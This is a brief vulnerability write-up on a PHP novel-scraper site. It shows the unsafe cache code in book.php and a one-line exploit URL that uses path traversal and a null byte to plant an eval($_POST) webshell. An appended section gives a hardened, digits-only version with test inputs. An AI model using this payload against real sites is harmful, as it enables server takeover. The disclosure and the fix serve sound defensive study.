By:Cond0r

A really dumb vulnerability.

It can only be exploited when caching is enabled.

First, look at the code.

book.php:

$kd_cachedir = "./cache";
if($kd_book_cache=="ture"){ // caching must be enabled
    $lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
    // echo $lastflesh;
    if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60) <= time())){
        ob_start();
        include "./templates/$kd_moban/book.html";
        $mianfei = ob_get_contents();
        ob_end_clean();
        file_put_contents("./cache/book$shuid.html",$mianfei);
        echo file_get_contents($kd_cachedir."/book$shuid.html");
    }else{
        echo file_get_contents("./cache/book$shuid.html");
    }
}else{
    include "./templates/$kd_moban/book.html";
}
?>

exp:http://1.com/book.php?id=/../../1.php%00“><?php eval($_POST[a])?>

Root directory: 1.php

Local test:

狂盗小说小偷 GET Shell vulnerability
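
A hardened form of the cache branch in book.php, added here as an example; it is not part of the original post or the application's own code. It accepts the id only as a short run of digits before any cache path is built, so nothing request-controlled reaches the file name passed to file_put_contents. Assumptions: $shuid is taken from the "id" request parameter, PHP 7.1 or later, and the names kd_cache_path, kd_serve_book and $render are hypothetical.

```php
<?php
// Added example, not the application's code. Assumption: $shuid comes from the "id" parameter.

// Map a request id to its cache file, or null if the id is not a plain positive integer.
function kd_cache_path(string $cacheDir, string $rawId): ?string
{
    // Digits only: rejects slashes, dots, NUL bytes and markup before any path is built.
    if (!preg_match('/\A[1-9][0-9]{0,8}\z/', $rawId)) {
        return null;
    }
    $dir = realpath($cacheDir);
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    return $dir . DIRECTORY_SEPARATOR . 'book' . $rawId . '.html';
}

// Serve a book page through the cache; $render (hypothetical) returns the page HTML.
function kd_serve_book(string $cacheDir, string $rawId, int $ttlHours, callable $render): ?string
{
    $path = kd_cache_path($cacheDir, $rawId);
    if ($path === null) {
        return null; // caller should answer 404; nothing is written
    }
    $mtime = @filemtime($path);
    if ($mtime === false || $mtime + $ttlHours * 3600 <= time()) {
        $html = $render((int) $rawId);
        file_put_contents($path, $html, LOCK_EX);
        return $html;
    }
    return file_get_contents($path);
}

// Constructed inputs: one valid id and three that must be refused.
$dir = sys_get_temp_dir() . '/kd_cache_demo';
if (!is_dir($dir)) { mkdir($dir, 0700); }
$render = function (int $id): string { return '<h1>Book ' . $id . '</h1>'; };
foreach (['42', '/../../1.php', "7\0", '<b>x</b>'] as $id) {
    $ok = kd_serve_book($dir, $id, 1, $render) !== null;
    printf("%-20s %s\n", json_encode($id, JSON_UNESCAPED_SLASHES), $ok ? 'served' : 'rejected');
}
```

Only the first input produces a cache file; the other three return null before any path is constructed.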